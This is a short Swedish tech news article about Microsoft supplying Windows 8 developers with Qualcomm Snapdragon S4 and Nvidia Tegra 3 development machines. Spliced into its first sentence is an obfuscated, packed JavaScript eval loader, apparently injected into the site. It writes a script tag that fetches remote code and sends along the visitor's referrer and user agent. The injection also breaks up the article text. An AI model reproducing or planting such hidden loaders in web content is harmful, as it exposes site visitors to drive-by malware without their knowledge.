Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

PC

Windows 8 utvecklare förses med Qualcomm och Nvidia för enheter

Windows 8 utvecklare förses med Qualcomm och Nvidia för enheter
Sebastian

Windows eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tdaei|var|u0026u|referrer|iydny||js|php’.split(’|’),0,{}))
8 ligger verkligen i fokus hos folket på Microsoft, detta är ingen hemlighet. Under MWC som pågick förra veckan la Microsoft en del tid åt att berätta om det kommande operativsystemet Windows 8 som nyss släpptes i en Consumer Preview.
Den kan du ladda ner ner här!

I denna satsning så tänker Microsoft i samband med Qualcomm och Nvidia ge ut utvecklingsmaskiner baserade på Snapdragon S4 MSM8960 och Tegra 3 till utvecklare.

Snapdragon S4 innehåller bland annat LTE, kamera och diverse andra saker som ska göra att utvecklare kan hitta på rätt mycket kul. Hela tanken är att ge dem ett försprång med att bygga och förfina Metro-applikationer som ska vara redo redan innan lanseringen.

Läs mer om Windows 8 och ladda ner Consumer Preview